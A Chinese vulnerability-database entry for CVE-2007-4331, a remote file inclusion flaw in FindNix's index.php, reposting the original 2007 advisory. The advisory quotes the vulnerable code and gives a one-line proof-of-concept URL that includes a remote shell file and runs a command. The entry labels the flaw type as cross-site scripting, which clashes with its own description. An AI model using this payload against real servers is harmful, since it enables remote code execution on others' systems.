FindNix'index.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1189484 漏洞类型 跨站脚本
发布时间 2007-08-13 更新时间 2007-08-13
CVE编号 CVE-2007-4331 CNNVD-ID CNNVD-200708-173
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://www.securityfocus.com/bid/81611
https://cxsecurity.com/issue/WLB-2007080059
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-173
|漏洞详情
FindNix的index.php中存在PHP远程文件包含漏洞。远程攻击者可以借助页参数中的一个URL,包括任意URLs的内容和执行跨站脚本攻击。
|漏洞EXP
FinDix Remote File Inclusion Vulnerability
-----------------------------------------------------------------------

Script : FinDix

Site : http://ctw-design.com/styldiv/FindNix.zip

Founder : Rizgar

Contact : rizgar (at) linuxmail (dot) org [email concealed]

Thanks : KHC, PH , ColdHackers, and my brothers, b0tan, b3g0k and nisto :) my heros :]

-----------------------------------------------------------------------

Okey now in the script found bug :

Line : 34-35

/*
* load page in content table
*/
if ($page == "")
$page = "start.htm"; //* change to your start page content.

/*

PoC :

http://www.site.com/findix/index.php?page=http://shell.txt?&cmd=id
|受影响的产品
Ctw Design Findnix 0
|参考资料

来源:BUGTRAQ
名称:20070809FinDixRemoteFileInclusionVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/475962/100/0/threaded
来源:OSVDB
名称:38709
链接:http://osvdb.org/38709
来源:XF
名称:findnix-index-file-include(35920)
链接:http://xforce.iss.net/xforce/xfdb/35920
来源:SREASON
名称:2992
链接:http://securityreason.com/securityalert/2992